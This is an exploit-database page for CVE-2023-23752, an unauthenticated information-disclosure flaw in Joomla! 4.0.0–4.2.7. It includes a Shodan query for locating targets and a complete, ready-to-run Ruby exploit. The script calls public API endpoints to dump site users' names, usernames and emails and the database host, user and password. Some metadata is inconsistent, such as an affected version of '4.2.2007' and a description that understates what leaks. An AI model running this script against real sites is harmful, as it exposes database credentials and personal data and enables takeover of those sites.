header-logo
Suggest Exploit
vendor:
Joomla!
by:
noraj (Alexandre ZANNI)
5.3
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: Joomla!
Affected Version From: 4.0.0
Affected Version To: 4.2.2007
Patch Exists: YES
Related CWE: CVE-2023-23752
CPE: a:joomla:joomla:4.2.7
Metasploit:
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=23752https://www.infosecmatter.com/nessus-plugin-library/?id=22235https://www.infosecmatter.com/nessus-plugin-library/?id=22368https://www.infosecmatter.com/nessus-plugin-library/?id=22267https://www.infosecmatter.com/nessus-plugin-library/?id=60097https://www.infosecmatter.com/nessus-plugin-library/?id=22873https://www.infosecmatter.com/nessus-plugin-library/?id=22206https://www.infosecmatter.com/nessus-plugin-library/?id=25444https://www.infosecmatter.com/nessus-plugin-library/?id=32122https://www.infosecmatter.com/nessus-plugin-library/?id=27620
Tags: cve,cve2023,joomla
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Nuclei References: https://unsafe.sh/go-149780.htmlhttps://twitter.com/gov_hack/status/1626471960141238272/photo/1https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.htmlhttps://nvd.nist.gov/vuln/detail/CVE-2023-23552
Nuclei Metadata: {'max-request': 2, 'shodan-query': 'html:"Joomla! - Open Source Content Management"', 'verified': True, 'vendor': 'joomla', 'product': 'joomla\\!'}
Platforms Tested: Joomla! Version 4.2.7
2023

Joomla! v4.2.8 – Unauthenticated information disclosure

Joomla! versions 4.0.0 to 4.2.7 are vulnerable to an unauthenticated information disclosure vulnerability. An attacker can exploit this vulnerability to gain access to sensitive information such as the version of Joomla! and the list of installed plugins.

Mitigation:

Upgrade to Joomla! version 4.2.8 or later.
Source

Exploit-DB raw data:

#!/usr/bin/env ruby

# Exploit
## Title: Joomla! v4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)
## Tested on: Joomla! Version 4.2.7
## CVE : CVE-2023-23752
## References:
##   - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/
##   - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
##   - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752
##   - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
##   - https://vulncheck.com/blog/joomla-for-rce
##   - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml

# standard library
require 'json'
# gems
require 'httpx'
require 'docopt'
require 'paint'

doc = <<~DOCOPT
  #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}

  #{Paint['Usage:', :red]}
    #{__FILE__} <url> [options]
    #{__FILE__} -h | --help

  #{Paint['Parameters:', :red]}
    <url>       Root URL (base path) including HTTP scheme, port and root folder

  #{Paint['Options:', :red]}
    --debug     Display arguments
    --no-color  Disable colorized output (NO_COLOR environment variable is respected too)
    -h, --help  Show this screen

  #{Paint['Examples:', :red]}
    #{__FILE__} http://127.0.0.1:4242
    #{__FILE__} https://example.org/subdir

  #{Paint['Project:', :red]}
    #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)
    #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)
    #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)
DOCOPT

def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end

def parse_users(root_url, http)
  data_json = fetch_users(root_url, http)
  data = JSON.parse(data_json)['data']
  users = []
  data.each do |user|
    if user['type'] == 'users'
      id = user['attributes']['id']
      name = user['attributes']['name']
      username = user['attributes']['username']
      email = user['attributes']['email']
      groups = user['attributes']['group_names']
      users << {id: id, name: name, username: username, email: email, groups: groups}
    end
  end
  users
end

def display_users(root_url, http)
  users = parse_users(root_url, http)
  puts Paint['Users', :red, :bold]
  users.each do |u|
    puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"
  end
end

def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end

def parse_config(root_url, http)
  data_json = fetch_config(root_url, http)
  data = JSON.parse(data_json)['data']
  config = {}
  data.each do |entry|
    if entry['type'] == 'application'
      key = entry['attributes'].keys.first
      config[key] = entry['attributes'][key]
    end
  end
  config
end

def display_config(root_url, http)
  c = parse_config(root_url, http)
  puts Paint['Site info', :red, :bold]
  puts "Site name: #{c['sitename']}"
  puts "Editor: #{c['editor']}"
  puts "Captcha: #{c['captcha']}"
  puts "Access: #{c['access']}"
  puts "Debug status: #{c['debug']}"
  puts
  puts Paint['Database info', :red, :bold]
  puts "DB type: #{c['dbtype']}"
  puts "DB host: #{c['host']}"
  puts "DB user: #{Paint[c['user'], :yellow, :bold]}"
  puts "DB password: #{Paint[c['password'], :yellow, :bold]}"
  puts "DB name: #{c['db']}"
  puts "DB prefix: #{c['dbprefix']}"
  puts "DB encryption #{c['dbencryption']}"
end

begin
  args = Docopt.docopt(doc)
  Paint.mode = 0 if args['--no-color']
  puts args if args['--debug']

  http = HTTPX
  display_users(args['<url>'], http)
  puts
  display_config(args['<url>'], http)
rescue Docopt::Exit => e
  puts e.message
end

Navigation

Suggest Exploit

Services By CQR